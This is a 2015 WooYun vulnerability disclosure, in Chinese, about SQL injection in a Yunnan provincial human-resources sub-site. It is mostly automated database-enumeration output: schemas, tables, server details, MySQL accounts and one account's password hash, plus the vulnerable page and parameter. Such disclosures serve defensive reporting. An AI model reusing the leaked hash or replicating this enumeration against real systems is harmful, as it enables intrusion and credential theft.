漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0143822
漏洞标题:某省军转安置网存在sql漏洞
相关厂商:云南省人力资源和社会保障厅
漏洞作者: 路人甲
提交时间:2015-10-06 22:35
修复时间:2015-11-26 11:14
公开时间:2015-11-26 11:14
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-10-06: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经确认,细节仅向厂商公开
2015-10-22: 细节向核心白帽子及相关领域专家公开
2015-11-01: 细节向普通白帽子公开
2015-11-11: 细节向实习白帽子公开
2015-11-26: 细节向公众公开
简要描述:
x省人力资源和社会保障网子站存在sql注入漏洞 多裤泄漏 包含主站数据库
详细说明:
云南省人力资源和社会保障网 二级子站存在SQL注入 多个数据库侧漏 敏感数据泄漏
back-end DBMS: MySQL 5.0
Database: sakila
[23 tables]
+----------------------------------------------------+
| language |
| actor |
| actor_info |
| address |
| category |
| city |
| country |
| customer |
| customer_list |
| film |
| film_actor |
| film_category |
| film_list |
| film_text |
| inventory |
| nicer_but_slower_film_list |
| payment |
| rental |
| sales_by_film_category |
| sales_by_store |
| staff |
| staff_list |
| store |
+----------------------------------------------------+
Database: performance_schema
[52 tables]
+----------------------------------------------------+
| accounts |
| cond_instances |
| events_stages_current |
| events_stages_history |
| events_stages_history_long |
| events_stages_summary_by_account_by_event_name |
| events_stages_summary_by_host_by_event_name |
| events_stages_summary_by_thread_by_event_name |
| events_stages_summary_by_user_by_event_name |
| events_stages_summary_global_by_event_name |
| events_statements_current |
| events_statements_history |
| events_statements_history_long |
| events_statements_summary_by_account_by_event_name |
| events_statements_summary_by_digest |
| events_statements_summary_by_host_by_event_name |
| events_statements_summary_by_thread_by_event_name |
| events_statements_summary_by_user_by_event_name |
| events_statements_summary_global_by_event_name |
| events_waits_current |
| events_waits_history |
| events_waits_history_long |
| events_waits_summary_by_account_by_event_name |
| events_waits_summary_by_host_by_event_name |
| events_waits_summary_by_instance |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_by_user_by_event_name |
| events_waits_summary_global_by_event_name |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| host_cache |
| hosts |
| mutex_instances |
| objects_summary_global_by_type |
| performance_timers |
| rwlock_instances |
| session_account_connect_attrs |
| session_connect_attrs |
| setup_actors |
| setup_consumers |
| setup_instruments |
| setup_objects |
| setup_timers |
| socket_instances |
| socket_summary_by_event_name |
| socket_summary_by_instance |
| table_io_waits_summary_by_index_usage |
| table_io_waits_summary_by_table |
| table_lock_waits_summary_by_table |
| threads |
| users |
+----------------------------------------------------+
Database: mysql
[28 tables]
+----------------------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| innodb_index_stats |
| innodb_table_stats |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slave_master_info |
| slave_relay_log_info |
| slave_worker_info |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------------------+
Database: world
[3 tables]
+----------------------------------------------------+
| city |
| country |
| countrylanguage |
+----------------------------------------------------+
Database: db_ynhrss
[41 tables]
+----------------------------------------------------+
| ccphl_appinfo |
| ccphl_indexplace |
| ccphl_leave_msg |
| ccphl_link |
| ccphl_news |
| ccphl_news_attach |
| ccphl_news_deputy |
| ccphl_news_image |
| ccphl_newsclass |
| ccphl_newsclasspermit |
| ccphl_newsidentitypermit |
| ccphl_newspost |
| ccphl_system_class_function |
| ccphl_system_function |
| ccphl_system_module_function |
| ccphl_system_role_class_button |
| ccphl_system_role_class_function |
| ccphl_system_role_module_button |
| ccphl_system_role_module_function |
| ccphl_system_role_user |
| ccphl_system_user_class_button |
| ccphl_system_user_class_function |
| ccphl_system_user_module_button |
| ccphl_system_user_module_function |
| ccphl_systemadclass |
| ccphl_systemadvertise |
| ccphl_systemdictionary |
| ccphl_systemlog |
| ccphl_systemmodule |
| ccphl_systemrole |
| ccphl_systemrolemodule_test |
| ccphl_systemsite |
| ccphl_systemuser |
| ccphl_template |
| ccphl_template_block_content |
| ccphl_template_siteused |
| ccphl_workloadstatistic |
| hz_infolib |
| hz_rules |
| hzinfocategory |
| testup |
+----------------------------------------------------+
Database: information_schema
[59 tables]
+----------------------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_PER_INDEX |
| INNODB_CMP_PER_INDEX_RESET |
| INNODB_CMP_RESET |
| INNODB_FT_BEING_DELETED |
| INNODB_FT_CONFIG |
| INNODB_FT_DEFAULT_STOPWORD |
| INNODB_FT_DELETED |
| INNODB_FT_INDEX_CACHE |
| INNODB_FT_INDEX_TABLE |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_METRICS |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_DATAFILES |
| INNODB_SYS_FIELDS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_INDEXES |
| INNODB_SYS_TABLES |
| INNODB_SYS_TABLESPACES |
| INNODB_SYS_TABLESTATS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| OPTIMIZER_TRACE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+----------------------------------------------------+
漏洞证明:
http://**.**.**.**/index.html
http://**.**.**.**/lmsg.aspx?classId=655
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0
current user is DBA: False
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0
database management system users [7]:
[*] 'root'@'%'
[*] 'root'@'**.**.**.**'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'ynhrss_km_cms'@'**.**.**.**'
[*] 'ynhrss_km_cms'@'**.**.**.**'
[*] 'ynhrss_km_cms'@'localhost'
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0
database management system users password hashes:
[*] ynhrss_km_cms [1]:
password hash: *F694A062B2B0E8BB360D5A89C779DF0B80D484E3
修复方案:
你懂的!
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2015-10-12 11:13
厂商回复:
CNVD确认所述情况,已经转由CNCERT下发给云南分中心,由其后续协调网站管理单位处置.
最新状态:
暂无